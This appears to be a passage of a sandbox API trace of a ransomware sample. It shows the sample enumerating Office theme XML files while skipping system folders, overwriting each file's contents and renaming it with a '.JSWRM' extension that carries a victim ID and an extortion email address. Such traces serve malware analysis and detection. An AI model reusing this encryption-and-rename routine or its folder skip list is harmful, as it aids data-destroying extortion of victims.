[0100.530] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.531] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.531] CloseHandle (hObject=0x314) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0100.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0100.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0100.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0100.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0100.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.531] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Warm.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue warm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue Warm.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue warm.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0100.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0100.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.532] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11377f40, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Blue.xml", cAlternateFileName="")) returned 1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2=".") returned 1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="..") returned 1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="...") returned 1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="windows") returned -1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="recovery") returned -1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="perflogs") returned -1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="documents and settings") returned -1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.532] lstrcmpiW (lpString1="Blue.xml", lpString2="system volume information") returned -1 [0100.533] lstrcmpiW (lpString1="Blue.xml", lpString2="msocache") returned -1 [0100.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue.xml", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue.xml", lpUsedDefaultChar=0x0) returned 8 [0100.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blue.xml", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blue.xml", lpUsedDefaultChar=0x0) returned 8 [0100.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0100.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0100.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.534] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=738) returned 1 [0100.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.534] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.536] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.536] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.536] CloseHandle (hObject=0x314) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0100.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0100.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0100.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Blue.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\blue.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0100.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0100.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0100.537] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1132ba98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11377f40, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Grayscale.xml", cAlternateFileName="GRAYSC~1.XML")) returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2=".") returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="..") returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="...") returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="windows") returned -1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="recovery") returned -1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="perflogs") returned -1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="documents and settings") returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="system volume information") returned -1 [0100.537] lstrcmpiW (lpString1="Grayscale.xml", lpString2="msocache") returned -1 [0100.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grayscale.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grayscale.xml", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grayscale.xml", lpUsedDefaultChar=0x0) returned 13 [0100.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0100.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grayscale.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grayscale.xml", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grayscale.xml", lpUsedDefaultChar=0x0) returned 13 [0100.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0100.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0100.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\grayscale.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.538] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=743) returned 1 [0100.538] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.538] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.540] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.540] CloseHandle (hObject=0x314) returned 1 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0100.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0100.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0100.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\grayscale.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Grayscale.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\grayscale.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0100.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.541] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1132ba98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ea, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Green Yellow.xml", cAlternateFileName="GREENY~1.XML")) returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2=".") returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="..") returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="...") returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="windows") returned -1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="recovery") returned -1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="perflogs") returned -1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="documents and settings") returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="system volume information") returned -1 [0100.541] lstrcmpiW (lpString1="Green Yellow.xml", lpString2="msocache") returned -1 [0100.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Yellow.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Yellow.xml", cchWideChar=16, lpMultiByteStr=0x240ef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Yellow.xml", lpUsedDefaultChar=0x0) returned 16 [0100.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Yellow.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Yellow.xml", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Yellow.xml", lpUsedDefaultChar=0x0) returned 16 [0100.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green Yellow.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green yellow.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.542] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=746) returned 1 [0100.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.542] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.544] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.544] CloseHandle (hObject=0x314) returned 1 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.544] HeapFree (in: 